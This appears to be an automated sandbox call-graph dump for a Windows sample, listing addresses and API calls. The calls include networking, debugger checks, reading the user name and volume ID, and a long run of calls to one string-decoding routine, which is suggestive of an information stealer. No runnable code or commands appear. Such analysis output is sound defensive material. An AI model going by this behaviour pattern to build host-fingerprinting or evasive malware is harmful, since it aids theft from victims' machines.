GetProcessHeap RtlAllocateHeap _time64 srand rand 68392->68394 68395 2a017f7 68393->68395 68399 2a01744 _memset 68394->68399 68395->68238 68396 2a01723 WriteFile 68396->68391 68396->68399 68397 2a01758 CloseHandle CreateFileW 68397->68391 68398 2a0178e ReadFile 68397->68398 68398->68391 68398->68399 68399->68391 68399->68396 68399->68397 68400 2a017b3 GetProcessHeap RtlFreeHeap CloseHandle 68399->68400 68400->68391 68400->68392 68402 2a18fa2 68401->68402 68650 2a12143 68402->68650 68406 2a18fc6 68655 2a12265 lstrlen 68406->68655 68409 2a12265 3 API calls 68410 2a18fe2 68409->68410 68659 2a121e9 68410->68659 68412 2a18feb 68413 2a1900d OpenEventA 68412->68413 68414 2a19006 CloseHandle 68413->68414 68415 2a1901d CreateEventA 68413->68415 68414->68413 68416 2a12143 lstrcpy 68415->68416 68417 2a19042 68416->68417 68663 2a121a5 lstrlen 68417->68663 68420 2a121a5 2 API calls 68421 2a190a9 68420->68421 68667 2a02edf 68421->68667 68424 2a1a132 121 API calls 68425 2a191dc 68424->68425 69222 2a138a6 68425->69222 68428 2a121e9 lstrcpy 68429 2a191f1 68428->68429 68430 2a12143 lstrcpy 68429->68430 68431 2a19208 68430->68431 68432 2a12265 3 API calls 68431->68432 68433 2a1921b 68432->68433 69230 2a12223 68433->69230 68436 2a121e9 lstrcpy 68437 2a19231 68436->68437 68438 2a19243 CreateDirectoryA 68437->68438 69234 2a01ced 68438->69234 68442 2a1926d 69318 2a19a28 68442->69318 68444 2a1927e 68445 2a121e9 lstrcpy 68444->68445 68446 2a19295 68445->68446 68447 2a121e9 lstrcpy 68446->68447 68448 2a192a5 68447->68448 69325 2a12175 68448->69325 68451 2a12265 3 API calls 68452 2a192c4 68451->68452 68453 2a121e9 lstrcpy 68452->68453 68454 2a192cd 68453->68454 68455 2a12223 2 API calls 68454->68455 68456 2a192ea 68455->68456 68457 2a121e9 lstrcpy 68456->68457 68458 2a192f3 68457->68458 68459 2a192fc InternetOpenA InternetOpenA 68458->68459 68460 2a12175 lstrcpy 68459->68460 68461 2a1933a 68460->68461 68462 2a12143 lstrcpy 68461->68462 68463 2a19349 68462->68463 69329 2a125fe GetWindowsDirectoryA 68463->69329 68466 2a12175 lstrcpy 68467 2a19364 68466->68467 69347 2a04a56 68467->69347 68471 2a19377 68472 2a12143 lstrcpy 68471->68472 68473 2a193a4 68472->68473 68474 2a01ced lstrcpy 68473->68474 68475 2a193b5 68474->68475 69497 2a05e61 68475->69497 68479 2a193d4 68480 2a12143 lstrcpy 68479->68480 68481 2a193e7 68480->68481 68482 2a01ced lstrcpy 68481->68482 68483 2a193f8 68482->68483 68484 2a05e61 40 API calls 68483->68484 68485 2a19404 68484->68485 69671 2a14ea7 strtok_s 68485->69671 68487 2a19417 68488 2a12143 lstrcpy 68487->68488 68489 2a1942a 68488->68489 68490 2a01ced lstrcpy 68489->68490 68491 2a1943b 68490->68491 68492 2a05e61 40 API calls 68491->68492 68493 2a19447 68492->68493 69680 2a14fdf strtok_s 68493->69680 68495 2a1945a 68496 2a01ced lstrcpy 68495->68496 68497 2a1946b 68496->68497 69687 2a158c3 68497->69687 68499 2a19470 68500 2a12175 lstrcpy 68499->68500 68501 2a1947e 68500->68501 68502 2a12143 lstrcpy 68501->68502 68503 2a1948c 68502->68503 70025 2a0515f 68503->70025 68506 2a01ced lstrcpy 68507 2a194a8 68506->68507 70044 2a0fabd 68507->70044 68509 2a194c5 68510 2a1953d 68509->68510 68511 2a12143 lstrcpy 68509->68511 68512 2a195bc 68510->68512 68515 2a12143 lstrcpy 68510->68515 68513 2a194eb 68511->68513 68514 2a12143 lstrcpy 68512->68514 68517 2a01ced lstrcpy 68513->68517 68518 2a195d8 68514->68518 68516 2a19563 68515->68516 68519 2a01ced lstrcpy 68516->68519 68520 2a194f5 68517->68520 68521 2a01ced lstrcpy 68518->68521 68522 2a19574 68519->68522 68523 2a05e61 40 API calls 68520->68523 68524 2a195e9 68521->68524 68526 2a05e61 40 API calls 68522->68526 68527 2a19501 68523->68527 68525 2a05e61 40 API calls 68524->68525 68529 2a19580 68526->68529 70081 2a151fc strtok_s 68527->70081 68630 2a04734 lstrlen 68629->68630 68631 2a02b6a 68629->68631 68630->68631 68631->68252 68633->68332 68635 2a01375 68634->68635 68635->68357 68644 2a128af GetProcessHeap RtlAllocateHeap GetUserNameA 68635->68644 68637 2a1e894 68636->68637 68638 2a1e896 IsDebuggerPresent 68636->68638 68637->68361 68645 2a1f1f5 68638->68645 68641 2a1ecd6 SetUnhandledExceptionFilter UnhandledExceptionFilter 68642 2a1ecfb GetCurrentProcess TerminateProcess 68641->68642 68643 2a1ecf3 __call_reportfault 68641->68643 68642->68361 68643->68642 68644->68362 68645->68641 68647 2a014d9 68646->68647 68648 2a014c9 lstrcmpiW 68647->68648 68649 2a014df 68647->68649 68648->68647 68648->68649 68649->68369 68649->68388 68651 2a1214e 68650->68651 68652 2a1216f 68651->68652 68653 2a12165 lstrcpy 68651->68653 68654 2a128af GetProcessHeap RtlAllocateHeap GetUserNameA 68652->68654 68653->68652 68654->68406 68657 2a1228c 68655->68657 68656 2a122b2 68656->68409 68657->68656 68658 2a1229f lstrcpy lstrcat 68657->68658 68658->68656 68660 2a121f8 68659->68660 68661 2a1221f 68660->68661 68662 2a12217 lstrcpy 68660->68662 68661->68412 68662->68661 68665 2a121ba 68663->68665 68664 2a121e3 68664->68420 68665->68664 68666 2a121d9 lstrcpy 68665->68666 68666->68664 68668 2a0470c 3 API calls 68667->68668 68669 2a02ef3 68668->68669 68670 2a0470c 3 API calls 68669->68670 68671 2a02f09 68670->68671 68672 2a0470c 3 API calls 68671->68672 68673 2a02f1f 68672->68673 68674 2a0470c 3 API calls 68673->68674 68675 2a02f37 68674->68675 68676 2a0470c 3 API calls 68675->68676 68677 2a02f4f 68676->68677 68678 2a0470c 3 API calls 68677->68678 68679 2a02f65 68678->68679 68680 2a0470c 3 API calls 68679->68680 68681 2a02f7e 68680->68681 68682 2a0470c 3 API calls 68681->68682 68683 2a02f94 68682->68683 68684 2a0470c 3 API calls 68683->68684 68685 2a02faa 68684->68685 68686 2a0470c 3 API calls 68685->68686 68687 2a02fc0 68686->68687 68688 2a0470c 3 API calls 68687->68688 68689 2a02fd5 68688->68689 68690 2a0470c 3 API calls 68689->68690 68691 2a02feb 68690->68691 68692 2a0470c 3 API calls 68691->68692 68693 2a03004 68692->68693 68694 2a0470c 3 API calls 68693->68694 68695 2a0301a 68694->68695 68696 2a0470c 3 API calls 68695->68696 68697 2a03030 68696->68697 68698 2a0470c 3 API calls 68697->68698 68699 2a03046 68698->68699 68700 2a0470c 3 API calls 68699->68700 68701 2a0305c 68700->68701 68702 2a0470c 3 API calls 68701->68702 68703 2a03072 68702->68703 68704 2a0470c 3 API calls 68703->68704 68705 2a0308b 68704->68705 68706 2a0470c 3 API calls 68705->68706 68707 2a030a0 68706->68707 68708 2a0470c 3 API calls 68707->68708 68709 2a030b6 68708->68709 68710 2a0470c 3 API calls 68709->68710 68711 2a030ce 68710->68711 68712 2a0470c 3 API calls 68711->68712 68713 2a030e3 68712->68713 68714 2a0470c 3 API calls 68713->68714 68715 2a030f9 68714->68715 68716 2a0470c 3 API calls 68715->68716 68717 2a03112 68716->68717 68718 2a0470c 3 API calls 68717->68718 68719 2a03128 68718->68719 68720 2a0470c 3 API calls 68719->68720 68721 2a0313d 68720->68721 68722 2a0470c 3 API calls 68721->68722 68723 2a03153 68722->68723 68724 2a0470c 3 API calls 68723->68724 68725 2a03168 68724->68725 68726 2a0470c 3 API calls 68725->68726 68727 2a0317d 68726->68727 68728 2a0470c 3 API calls 68727->68728 68729 2a03196 68728->68729 68730 2a0470c 3 API calls 68729->68730 68731 2a031ab 68730->68731 68732 2a0470c 3 API calls 68731->68732 68733 2a031c1 68732->68733 68734 2a0470c 3 API calls 68733->68734 68735 2a031d7 68734->68735 68736 2a0470c 3 API calls 68735->68736 68737 2a031ed 68736->68737 68738 2a0470c 3 API calls 68737->68738 68739 2a03202 68738->68739 68740 2a0470c 3 API calls 68739->68740 68741 2a0321b 68740->68741 68742 2a0470c 3 API calls 68741->68742 68743 2a03231 68742->68743 68744 2a0470c 3 API calls 68743->68744 68745 2a03247 68744->68745 68746 2a0470c 3 API calls 68745->68746 68747 2a0325c 68746->68747 68748 2a0470c 3 API calls 68747->68748 68749 2a03271 68748->68749 68750 2a0470c 3 API calls 68749->68750 68751 2a03287 68750->68751 68752 2a0470c 3 API calls 68751->68752 68753 2a032a0 68752->68753 68754 2a0470c 3 API calls 68753->68754 68755 2a032b5 68754->68755 68756 2a0470c 3 API calls 68755->68756 68757 2a032ca 68756->68757 68758 2a0470c 3 API calls 68757->68758 68759 2a032e0 68758->68759 68760 2a0470c 3 API calls 68759->68760 68761 2a032f5 68760->68761 68762 2a0470c 3 API calls 68761->68762 68763 2a0330a 68762->68763 68764 2a0470c 3 API calls 68763->68764 68765 2a03322 68764->68765 68766 2a0470c 3 API calls 68765->68766 68767 2a03337 68766->68767 68768 2a0470c 3 API calls 68767->68768 68769 2a0334d 68768->68769 68770 2a0470c 3 API calls 68769->68770 68771 2a03363 68770->68771 68772 2a0470c 3 API calls 68771->68772 68773 2a03379 68772->68773 68774 2a0470c 3 API calls 68773->68774 68775 2a0338f 68774->68775 68776 2a0470c 3 API calls 68775->68776 68777 2a033a8 68776->68777 68778 2a0470c 3 API calls 68777->68778 68779 2a033be 68778->68779 68780 2a0470c 3 API calls 68779->68780 68781 2a033d4 68780->68781 68782 2a0470c 3 API calls 68781->68782 68783 2a033ea 68782->68783 68784 2a0470c 3 API calls 68783->68784 68785 2a03400 68784->68785 68786 2a0470c 3 API calls 68785->68786 68787 2a03416 68786->68787 68788 2a0470c 3 API calls 68787->68788 68789 2a0342f 68788->68789 68790 2a0470c 3 API calls 68789->68790 68791 2a03445 68790->68791 68792 2a0470c 3 API calls 68791->68792 68793 2a0345b 68792->68793 68794 2a0470c 3 API calls 68793->68794 68795 2a03470 68794->68795 68796 2a0470c 3 API calls 68795->68796 68797 2a03486 68796->68797 68798 2a0470c 3 API calls 68797->68798 68799 2a0349c 68798->68799 68800 2a0470c 3 API calls 68799->68800 68801 2a034b5 68800->68801 68802 2a0470c 3 API calls 68801->68802 68803 2a034cb 68802->68803 68804 2a0470c 3 API calls 68803->68804 68805 2a034e1 68804->68805 68806 2a0470c 3 API calls 68805->68806 68807 2a034f7 68806->68807 68808 2a0470c 3 API calls 68807->68808 68809 2a0350d 68808->68809 68810 2a0470c 3 API calls 68809->68810 68811 2a03523 68810->68811 68812 2a0470c 3 API calls 68811->68812 68813 2a0353c 68812->68813 68814 2a0470c 3 API calls 68813->68814 68815 2a03552 68814->68815 68816 2a0470c 3 API calls 68815->68816 68817 2a03568 68816->68817 68818 2a0470c 3 API calls 68817->68818 68819 2a0357e 68818->68819 68820 2a0470c 3 API calls 68819->68820 68821 2a03594 68820->68821 68822 2a0470c 3 API calls 68821->68822 68823 2a035aa 68822->68823 68824 2a0470c 3 API calls 68823->68824 68825 2a035c2 68824->68825 68826 2a0470c 3 API calls 68825->68826 68827 2a035d7 68826->68827 68828 2a0470c 3 API calls 68827->68828 68829 2a035ed 68828->68829 68830 2a0470c 3 API calls 68829->68830 68831 2a03603 68830->68831 68832 2a0470c 3 API calls 68831->68832 68833 2a03619 68832->68833 68834 2a0470c 3 API calls 68833->68834 68835 2a0362e 68834->68835 68836 2a0470c 3 API calls 68835->68836 68837 2a03647 68836->68837 68838 2a0470c 3 API calls 68837->68838 68839 2a0365d 68838->68839 68840 2a0470c 3 API calls 68839->68840 68841 2a03673 68840->68841 68842 2a0470c 3 API calls 68841->68842 68843 2a03688 68842->68843 68844 2a0470c 3 API calls 68843->68844 68845 2a0369e 68844->68845 68846 2a0470c 3 API calls 68845->68846 68847 2a036b4 68846->68847 68848 2a0470c 3 API calls 68847->68848 68849 2a036cd 68848->68849 68850 2a0470c 3 API calls 68849->68850 68851 2a036e3 68850->68851 68852 2a0470c 3 API calls 68851->68852 68853 2a036f9 68852->68853 68854 2a0470c 3 API calls 68853->68854 68855 2a0370f 68854->68855 68856 2a0470c 3 API calls 68855->68856 68857 2a03725 68856->68857 68858 2a0470c 3 API calls 68857->68858 68859 2a0373b 68858->68859 68860 2a0470c 3 API calls 68859->68860 68861 2a03754 68860->68861 68862 2a0470c 3 API calls 68861->68862 68863 2a0376a 68862->68863 68864 2a0470c 3 API calls 68863->68864 68865 2a03780 68864->68865 68866 2a0470c 3 API calls 68865->68866 68867 2a03796 68866->68867 68868 2a0470c 3 API calls 68867->68868 68869 2a037ac 68868->68869 68870 2a0470c 3 API calls 68869->68870 68871 2a037c1 68870->68871 68872 2a0470c 3 API calls 68871->68872 68873 2a037da 68872->68873 68874 2a0470c 3 API calls 68873->68874 68875 2a037ef 68874->68875 68876 2a0470c 3 API calls 68875->68876 68877 2a03805 68876->68877 68878 2a0470c 3 API calls 68877->68878 68879 2a0381b 68878->68879 68880 2a0470c 3 API calls 68879->68880 68881 2a03831 68880->68881 68882 2a0470c 3 API calls 68881->68882 68883 2a03847 68882->68883 68884 2a0470c 3 API calls 68883->68884 68885 2a0385f 68884->68885 68886 2a0470c 3 API calls 68885->68886 68887 2a03875 68886->68887 68888 2a0470c 3 API calls 68887->68888 68889 2a0388b 68888->68889 68890 2a0470c 3 API calls 68889->68890 68891 2a038a1 68890->68891 68892 2a0470c 3 API calls 68891->68892 68893 2a038b7 68892->68893 68894 2a0470c 3 API calls 68893->68894 68895 2a038cd 68894->68895 68896 2a0470c 3 API calls 68895->68896 68897 2a038e6 68896->68897 68898 2a0470c 3 API calls 68897->68898 68899 2a038fc 68898->68899 68900 2a0470c 3 API calls 68899->68900 68901 2a03912 68900->68901 68902 2a0470c 3 API calls 68901->68902 68903 2a03928 68902->68903 68904 2a0470c 3 API calls 68903->68904 68905 2a0393e 68904->68905 68906 2a0470c 3 API calls 68905->68906 68907 2a03954 68906->68907 68908 2a0470c 3 API calls 68907->68908 68909 2a0396d 68908->68909 68910 2a0470c 3 API calls 68909->68910 68911 2a03982 68910->68911 68912 2a0470c 3 API calls 68911->68912 68913 2a03998 68912->68913 68914 2a0470c 3 API calls 68913->68914 68915 2a039ae 68914->68915 68916 2a0470c 3 API calls 68915->68916 68917 2a039c4 68916->68917 68918 2a0470c 3 API calls 68917->68918 68919 2a039da 68918->68919 68920 2a0470c 3 API calls 68919->68920 68921 2a039f3 68920->68921 68922 2a0470c 3 API calls 68921->68922 68923 2a03a09 68922->68923 68924 2a0470c 3 API calls 68923->68924 68925 2a03a1f 68924->68925 68926 2a0470c 3 API calls 68925->68926 68927 2a03a35 68926->68927 68928 2a0470c 3 API calls 68927->68928 68929 2a03a4a 68928->68929 68930 2a0470c 3 API calls 68929->68930 68931 2a03a60 68930->68931 68932 2a0470c 3 API calls 68931->68932 68933 2a03a79 68932->68933 68934 2a0470c 3 API calls 68933->68934 68935 2a03a8f 68934->68935 68936 2a0470c 3 API calls 68935->68936 68937 2a03aa5 68936->68937 68938 2a0470c 3 API calls 68937->68938 68939 2a03abb 68938->68939 68940 2a0470c 3 API calls 68939->68940 68941 2a03ad1 68940->68941 68942 2a0470c 3 API calls 68941->68942 68943 2a03ae7 68942->68943 68944 2a0470c 3 API calls 68943->68944 68945 2a03b00 68944->68945 68946 2a0470c 3 API calls 68945->68946 68947 2a03b16 68946->68947 68948 2a0470c 3 API calls 68947->68948 68949 2a03b2c 68948->68949 68950 2a0470c 3 API calls 68949->68950 68951 2a03b42 68950->68951 68952 2a0470c 3 API calls 68951->68952 68953 2a03b57 68952->68953 68954 2a0470c 3 API calls 68953->68954 68955 2a03b6d 68954->68955 68956 2a0470c 3 API calls 68955->68956 68957 2a03b86 68956->68957 68958 2a0470c 3 API calls 68957->68958 68959 2a03b9c 68958->68959 68960 2a0470c 3 API calls 68959->68960 68961 2a03bb2 68960->68961 68962 2a0470c 3 API calls 68961->68962 68963 2a03bc8 68962->68963 68964 2a0470c 3 API calls 68963->68964 68965 2a03bde 68964->68965 68966 2a0470c 3 API calls 68965->68966 68967 2a03bf4 68966->68967 68968 2a0470c 3 API calls 68967->68968 68969 2a03c0d 68968->68969 68970 2a0470c 3 API calls 68969->68970 68971 2a03c23 68970->68971 68972 2a0470c 3 API calls 68971->68972 68973 2a03c39 68972->68973 68974 2a0470c 3 API calls 68973->68974 68975 2a03c4f 68974->68975 68976 2a0470c 3 API calls 68975->68976 68977 2a03c64 68976->68977 68978 2a0470c 3 API calls 68977->68978 68979 2a03c7a 68978->68979 68980 2a0470c 3 API calls 68979->68980 68981 2a03c92 68980->68981 68982 2a0470c 3 API calls 68981->68982 68983 2a03ca8 68982->68983 68984 2a0470c 3 API calls 68983->68984 68985 2a03cbe 68984->68985 68986 2a0470c 3 API calls 68985->68986 68987 2a03cd4 68986->68987 68988 2a0470c 3 API calls 68987->68988 68989 2a03cea 68988->68989 68990 2a0470c 3 API calls 68989->68990 68991 2a03d00 68990->68991 68992 2a0470c 3 API calls 68991->68992 68993 2a03d19 68992->68993 68994 2a0470c 3 API calls 68993->68994 68995 2a03d2f 68994->68995 68996 2a0470c 3 API calls 68995->68996 68997 2a03d45 68996->68997 68998 2a0470c 3 API calls 68997->68998 68999 2a03d5b 68998->68999 69000 2a0470c 3 API calls 68999->69000 69001 2a03d71 69000->69001 69002 2a0470c 3 API calls 69001->69002 69003 2a03d87 69002->69003 69004 2a0470c 3 API calls 69003->69004 69005 2a03da0 69004->69005 69006 2a0470c 3 API calls 69005->69006 69007 2a03db6 69006->69007 69008 2a0470c 3 API calls 69007->69008 69009 2a03dcc 69008->69009 69010 2a0470c 3 API calls 69009->69010 69011 2a03de1 69010->69011 69012 2a0470c 3 API calls 69011->69012 69013 2a03df7 69012->69013 69014 2a0470c 3 API calls 69013->69014 69015 2a03e0d 69014->69015 69016 2a0470c 3 API calls 69015->69016 69017 2a03e26 69016->69017 69018 2a0470c 3 API calls 69017->69018 69019 2a03e3c 69018->69019 69020 2a0470c 3 API calls 69019->69020 69021 2a03e52 69020->69021 69022 2a0470c 3 API calls 69021->69022 69023 2a03e67 69022->69023 69024 2a0470c 3 API calls 69023->69024 69025 2a03e7d 69024->69025 69026 2a0470c 3 API calls 69025->69026 69027 2a03e93 69026->69027 69028 2a0470c 3 API calls 69027->69028 69029 2a03eac 69028->69029 69030 2a0470c 3 API calls 69029->69030 69031 2a03ec2 69030->69031 69032 2a0470c 3 API calls 69031->69032 69033 2a03ed8 69032->69033 69034 2a0470c 3 API calls 69033->69034 69035 2a03eee 69034->69035 69036 2a0470c 3 API calls 69035->69036 69037 2a03f04 69036->69037 69038 2a0470c 3 API calls 69037->69038 69039 2a03f19 69038->69039 69040 2a0470c 3 API calls 69039->69040 69041 2a03f32 69040->69041 69042 2a0470c 3 API calls 69041->69042 69043 2a03f48 69042->69043 69044 2a0470c 3 API calls 69043->69044 69045 2a03f5e 69044->69045 69046 2a0470c 3 API calls 69045->69046 69047 2a03f74 69046->69047 69048 2a0470c 3 API calls 69047->69048 69049 2a03f8a 69048->69049 69050 2a0470c 3 API calls 69049->69050 69051 2a03fa0 69050->69051 69052 2a0470c 3 API calls 69051->69052 69053 2a03fb8 69052->69053 69054 2a0470c 3 API calls 69053->69054 69055 2a03fce 69054->69055 69056 2a0470c 3 API calls 69055->69056 69057 2a03fe3 69056->69057 69058 2a0470c 3 API calls 69057->69058 69059 2a03ff8 69058->69059 69060 2a0470c 3 API calls 69059->69060 69061 2a0400e 69060->69061 69062 2a0470c 3 API calls 69061->69062 69063 2a04023 69062->69063 69064 2a0470c 3 API calls 69063->69064 69065 2a0403c 69064->69065 69066 2a0470c 3 API calls 69065->69066 69067 2a04052 69066->69067 69068 2a0470c 3 API calls 69067->69068 69069 2a04068 69068->69069 69070 2a0470c 3 API calls 69069->69070 69071 2a0407e 69070->69071 69072 2a0470c 3 API calls 69071->69072 69073 2a04094 69072->69073 69074 2a0470c 3 API calls 69073->69074 69075 2a040aa 69074->69075 69076 2a0470c 3 API calls 69075->69076 69077 2a040c2 69076->69077 69078 2a0470c 3 API calls 69077->69078 69079 2a040d7 69078->69079 69080 2a0470c 3 API calls 69079->69080 69081 2a040ec 69080->69081 69082 2a0470c 3 API calls 69081->69082 69083 2a04102 69082->69083 69084 2a0470c 3 API calls 69083->69084 69085 2a04118 69084->69085 69086 2a0470c 3 API calls 69085->69086 69087 2a0412d 69086->69087 69088 2a0470c 3 API calls 69087->69088 69089 2a04146 69088->69089 69090 2a0470c 3 API calls 69089->69090 69091 2a0415c 69090->69091 69092 2a0470c 3 API calls 69091->69092 69093 2a04171 69092->69093 69094 2a0470c 3 API calls 69093->69094 69095 2a04187 69094->69095 69096 2a0470c 3 API calls 69095->69096 69097 2a0419d 69096->69097 69098 2a0470c 3 API calls 69097->69098 69099 2a041b2 69098->69099 69100 2a0470c 3 API calls 69099->69100 69101 2a041cb 69100->69101 69102 2a0470c 3 API calls 69101->69102 69103 2a041e1 69102->69103 69104 2a0470c 3 API calls 69103->69104 69105 2a041f7 69104->69105 69106 2a0470c 3 API calls 69105->69106 69107 2a0420c 69106->69107 69108 2a0470c 3 API calls 69107->69108 69109 2a04222 69108->69109 69110 2a0470c 3 API calls 69109->69110 69111 2a04238 69110->69111 69112 2a0470c 3 API calls 69111->69112 69113 2a04251 69112->69113 69114 2a0470c 3 API calls 69113->69114 69115 2a04267 69114->69115 69116 2a0470c 3 API calls 69115->69116 69117 2a0427d 69116->69117 69118 2a0470c 3 API calls 69117->69118 69119 2a04292 69118->69119 69120 2a0470c 3 API calls 69119->69120 69121 2a042a8 69120->69121 69122 2a0470c 3 API calls 69121->69122 69123 2a042be 69122->69123 69124 2a0470c 3 API calls 69123->69124 69125 2a042d7 69124->69125 69126 2a0470c 3 API calls 69125->69126 69127 2a042ec 69126->69127 69128 2a0470c 3 API calls 69127->69128 69129 2a04302 69128->69129 69130 2a0470c 3 API calls 69129->69130 69131 2a04318 69130->69131 69132 2a0470c 3 API calls 69131->69132 69133 2a0432e 69132->69133 69134 2a0470c 3 API calls 69133->69134 69135 2a04344 69134->69135 69136 2a0470c 3 API calls 69135->69136 69137 2a0435d 69136->69137 69138 2a0470c 3 API calls 69137->69138 69139 2a04373 69138->69139 69140 2a0470c 3 API calls 69139->69140 69141 2a04388 69140->69141 69142 2a0470c 3 API calls 69141->69142 69143 2a0439d 69142->69143 69144 2a0470c 3 API calls 69143->69144 69145 2a043b2 69144->69145 69146 2a0470c 3 API calls 69145->69146 69147 2a043c7 69146->69147 69148 2a0470c 3 API calls 69147->69148 69149 2a043e0 69148->69149 69150 2a0470c 3 API calls 69149->69150 69151 2a043f6 69150->69151 69152 2a0470c 3 API calls 69151->69152 69153 2a0440b 69152->69153 69154 2a0470c 3 API calls 69153->69154 69155 2a04421 69154->69155 69156 2a0470c 3 API calls 69155->69156 69157 2a04436 69156->69157 69158 2a0470c 3 API calls 69157->69158 69159 2a0444c 69158->69159 69160 2a0470c 3 API calls 69159->69160 69161 2a04465 69160->69161 69162 2a0470c 3 API calls 69161->69162 69163 2a0447a 69162->69163 69164 2a0470c 3 API calls 69163->69164 69165 2a0448f 69164->69165 69166 2a0470c 3 API calls 69165->69166 69167 2a044a5 69166->69167 69168 2a0470c 3 API calls 69167->69168 69169 2a044bb 69168->69169 69170 2a0470c 3 API calls 69169->69170 69171 2a044d1 69170->69171 69172 2a0470c 3 API calls 69171->69172 69173 2a044ea 69172->69173 69174 2a0470c 3 API calls 69173->69174 69175 2a04500 69174->69175 69176 2a0470c 3 API calls 69175->69176 69177 2a04516 69176->69177 69178 2a0470c 3 API calls 69177->69178 69179 2a0452c 69178->69179 69180 2a0470c 3 API calls 69179->69180 69181 2a04541 69180->69181 69182 2a0470c 3 API calls 69181->69182 69183 2a04556 69182->69183 69184 2a0470c 3 API calls 69183->69184 69185 2a04571 69184->69185 69186 2a0470c 3 API calls 69185->69186 69187 2a04586 69186->69187 69188 2a0470c 3 API calls 69187->69188 69189 2a0459c 69188->69189 69190 2a0470c 3 API calls 69189->69190 69191 2a045b2 69190->69191 69192 2a0470c 3 API calls 69191->69192 69193 2a045c8 69192->69193 69194 2a0470c 3 API calls 69193->69194 69195 2a045de 69194->69195 69196 2a0470c 3 API calls 69195->69196 69197 2a045f7 69196->69197 69198 2a0470c 3 API calls 69197->69198 69199 2a0460d 69198->69199 69200 2a0470c 3 API calls 69199->69200 69201 2a04622 69200->69201 69202 2a0470c 3 API calls 69201->69202 69203 2a04637 69202->69203 69204 2a0470c 3 API calls 69203->69204 69205 2a0464d 69204->69205 69206 2a0470c 3 API calls 69205->69206 69207 2a04662 69206->69207 69208 2a0470c 3 API calls 69207->69208 69209 2a0467b 69208->69209 69210 2a0470c 3 API calls 69209->69210 69211 2a04691 69210->69211 69212 2a0470c 3 API calls 69211->69212 69213 2a046a6 69212->69213 69214 2a0470c 3 API calls 69213->69214 69215 2a046bb 69214->69215 69216 2a0470c 3 API calls 69215->69216 69217 2a046d1 69216->69217 69218 2a0470c 3 API calls 69217->69218 69219 2a046e7 69218->69219 69220 2a0470c 3 API calls 69219->69220 69221 2a04700 69220->69221 69221->68424 69223 2a12143 lstrcpy 69222->69223 69224 2a138c3 69223->69224 69225 2a12143 lstrcpy 69224->69225 69226 2a138d1 GetSystemTime 69225->69226 69227 2a138ed 69226->69227 69228 2a1e88c DName::DName 5 API calls 69227->69228 69229 2a13924 69228->69229 69229->68428 69232 2a1223d 69230->69232 69231 2a12261 69231->68436 69232->69231 69233 2a1224f lstrcpy lstrcat 69232->69233 69233->69231 69235 2a12175 lstrcpy 69234->69235 69236 2a01cf7 69235->69236 69237 2a12175 lstrcpy 69236->69237 69238 2a01d02 69237->69238 69239 2a12175 lstrcpy 69238->69239 69240 2a01d0d 69239->69240 69241 2a12175 lstrcpy 69240->69241 69242 2a01d24 69241->69242 69243 2a18705 69242->69243 69244 2a121a5 2 API calls 69243->69244 69245 2a1873b 69244->69245 69246 2a121a5 2 API calls 69245->69246 69247 2a18748 69246->69247 69248 2a121a5 2 API calls 69247->69248 69249 2a18755 69248->69249 69250 2a12143 lstrcpy 69249->69250 69251 2a18762 69250->69251 69252 2a12143 lstrcpy 69251->69252 69253 2a1876f 69252->69253 69254 2a12143 lstrcpy 69253->69254 69255 2a1877c 69254->69255 69256 2a12143 lstrcpy 69255->69256 69257 2a18789 69256->69257 69258 2a12143 lstrcpy 69257->69258 69259 2a18796 69258->69259 69260 2a12143 lstrcpy 69259->69260 69316 2a187a3 69260->69316 69263 2a187e7 StrCmpCA 69264 2a18840 StrCmpCA 69263->69264 69263->69316 69265 2a18a23 69264->69265 69264->69316 69268 2a121e9 lstrcpy 69265->69268 69269 2a18a2e 69268->69269 69271 2a12143 lstrcpy 69269->69271 69272 2a18a3b 69271->69272 69274 2a121e9 lstrcpy 69272->69274 69273 2a01ced lstrcpy 69273->69316 69277 2a1897b 69274->69277 69275 2a1858d 28 API calls 69275->69316 69276 2a18615 33 API calls 69276->69316 69278 2a12143 lstrcpy 69277->69278 69279 2a18a5a 69278->69279 69280 2a121e9 lstrcpy 69279->69280 69283 2a18a64 69280->69283 69281 2a188a0 StrCmpCA 69282 2a188f9 StrCmpCA 69281->69282 69281->69316 69285 2a189f2 69282->69285 69286 2a1890f StrCmpCA 69282->69286 70319 2a18af1 69283->70319 69287 2a121e9 lstrcpy 69285->69287 69288 2a189c1 69286->69288 69289 2a18925 StrCmpCA 69286->69289 69293 2a189fd 69287->69293 69291 2a121e9 lstrcpy 69288->69291 69294 2a18937 StrCmpCA 69289->69294 69295 2a1898d 69289->69295 69290 2a12175 lstrcpy 69290->69316 69298 2a189cc 69291->69298 69300 2a12143 lstrcpy 69293->69300 69296 2a18959 69294->69296 69297 2a18949 Sleep 69294->69297 69299 2a121e9 lstrcpy 69295->69299 69302 2a121e9 lstrcpy 69296->69302 69297->69316 69303 2a12143 lstrcpy 69298->69303 69304 2a18998 69299->69304 69301 2a18a0a 69300->69301 69305 2a121e9 lstrcpy 69301->69305 69306 2a18964 69302->69306 69307 2a189d9 69303->69307 69308 2a12143 lstrcpy 69304->69308 69305->69277 69309 2a12143 lstrcpy 69306->69309 69310 2a121e9 lstrcpy 69307->69310 69311 2a189a5 69308->69311 69312 2a18971 69309->69312 69310->69277 69313 2a121e9 lstrcpy 69311->69313 69314 2a121e9 lstrcpy 69312->69314 69313->69277 69314->69277 69315 2a121e9 lstrcpy 69315->69316 69316->69263 69316->69264 69316->69273 69316->69275 69316->69276 69316->69281 69316->69282 69316->69290 69316->69315 70310 2a029e8 69316->70310 70313 2a029f9 69316->70313 70316 2a02a0a 69316->70316 70326 2a02a1b lstrcpy 69316->70326 70327 2a02a2c lstrcpy 69316->70327 70328 2a02a3d lstrcpy 69316->70328 69317 2a18a77 69317->68442 69319 2a121e9 lstrcpy 69318->69319 69320 2a19a32 69319->69320 69321 2a121e9 lstrcpy 69320->69321 69322 2a19a3d 69321->69322 69323 2a121e9 lstrcpy 69322->69323 69324 2a19a48 69323->69324 69324->68444 69326 2a12185 69325->69326 69327 2a1219a 69326->69327 69328 2a12192 lstrcpy 69326->69328 69327->68451 69328->69327 69330 2a12642 GetVolumeInformationA 69329->69330 69331 2a1263b 69329->69331 69332 2a126a9 69330->69332 69331->69330 69332->69332 69333 2a126be GetProcessHeap RtlAllocateHeap 69332->69333 69334 2a126d9 69333->69334 69335 2a126e8 wsprintfA lstrcat 69333->69335 69336 2a12143 lstrcpy 69334->69336 70329 2a132e0 GetCurrentHwProfileA 69335->70329 69339 2a126e1 69336->69339 69338 2a12723 lstrlen 70345 2a1421b lstrcpy malloc strncpy 69338->70345 69342 2a1e88c DName::DName 5 API calls 69339->69342 